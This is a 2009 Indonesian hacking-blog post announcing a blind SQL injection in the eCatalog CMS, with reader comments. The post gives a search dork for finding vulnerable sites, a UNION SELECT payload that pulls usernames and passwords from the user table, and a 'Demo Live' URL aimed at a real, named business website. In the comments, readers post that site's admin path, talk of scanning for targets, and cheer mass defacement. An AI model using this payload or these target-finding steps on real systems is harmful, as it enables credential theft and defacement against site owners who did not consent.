«
»

eCatalog [MalingSial CMS] – Blind SQL Injection Vulnerability

September 27, 2009, 10:03

————————————————————————————————————————————————————-

Author          : YaDoY666

Contact         : YaDoY666[a]ServerIsDown[dot]Org

Group            : ServerIsDown

Date              : September 27th, 2009

————————————————————————————————————————————————————-

[-]  Dork

[+] “catalog/details.asp?id=” or use your own keyword

[-] Exploit

[+]  details.asp?id=[id]+union+select 1,2,3,4,5,6,username,8,9,10,11,12,13,password from user

[-] POC

http://127.0.0.1/catalog/details.asp?id=706+union+select 1,2,3,4,5,6,username,8,9,10,11,12,13,password from user

[-] Demo Live

http://www.honourfurniture.com.my/catalog/details.asp?id=771+union+select 1,2,3,4,5,6,username,8,9,10,11,12,13,password from user

[-] Greetz

Jack-, Don Tukuleso, XShadow, Kecemplungkalen, v3nom, indounderground, mistersaint, m3g4tr0n, gblack, miya666, ServerIsDown, Mainhack Brotherhood, Indonesian Coder, You.

- Proud To Be Indonesian -

[*] Cepet sembuh yah mi, Luph you always [*]

  • Share/Bookmark
Category: Bugs, Dork, Hacking, SQL Injection, Software, Uncategorized  |  Comment (RSS)  |  Trackback

15 Comments

  1. Jack says:
    September 27, 2009 at 10:16

    PERTAMAX!!
    Wow,.. keren doy :”>
    saya suka dengan ini…
    *BRB* SCAN
    semoga tidak gagal pertamax :D

  2. YaDoY666 says:
    September 27, 2009 at 10:17

    Hahahaha…
    Silahkan Jack-

  3. Don Tukulesto says:
    September 27, 2009 at 10:57

    gagal pertamax

  4. ayief says:
    October 1, 2009 at 16:18

    http://www.honourfurniture.com.my/catalog/admin/

    hahaha tq gan

  5. YaDoY666 says:
    October 1, 2009 at 19:52

    Yuuuk mareeee

    Ratakan…!!!

  6. jojo says:
    October 3, 2009 at 17:40

    ayo dong gan,,,,,,,, btw gan situs jasakom di hack ya………….

  7. YaDoY666 says:
    October 3, 2009 at 22:22

    Apaan yg ayo?

    jasakom di hack? dah di hack balik tuh… :P

  8. denbayan says:
    October 7, 2009 at 17:38

    @ jojo : tapi di pojok kiri bawah transfer dari jatimcrew
    mending jangan dibuka lagi , katanya bahaya ,,,,,
    maaf so tau ,,,

  9. paddi says:
    October 17, 2009 at 17:11

    Wahhh, mata jadi sakit nih liat warnanya,wkwkwkw

  10. kaka11ai.net says:
    October 26, 2009 at 06:30

    Salam Hormat suhu2 dan shifu2….

  11. kaka11 says:
    October 26, 2009 at 06:31

    Salah nulis nama pulak…wakakakka…

  12. andri says:
    November 20, 2009 at 18:36

    mas…
    nie hanya permintaan kecil saya dan newbie yang laen di seluruh nusantara…
    gimana kalau website anda membuat artikel tentang semua artikel mengenai website yang sudah di hack….
    khusus na website malaysia….
    apa lagi sekarang lagi marak2 tapi informasi na hanya alamat website yang sudah dihack..
    walaupun kami tidak bisa membantu dalam menghack website malaysia tapi kami butuh informasi tentang apa yang sudah dihack…
    tolong ya mas yadoy666

  13. ciute says:
    December 9, 2009 at 17:07

    ..::HACKED BY CIUTEGIRL::..
    Earth Under Attack :
    thanks –>>>: HACKER NEWBIE..::(C1u7e G1rl)::..http://www.ciutegirl.comcontact us: ciutegirl@rocketmail.com
    </DI

  14. coboyina says:
    January 31, 2010 at 02:02

    ‘thanks buat tutorialnya
    ’support buat dulur2 semua yg dah hack sites si MaLIng tukang nyokot budaya urang… Sori teu bisa bantu banyak.. Can bisa web sih ngan bisa VB hungkul T_T
    Ajarin atuh a’

  15. Joglo says:
    February 1, 2010 at 15:13

    maknyus ene doy.. dapet banyak @_@

Leave a Reply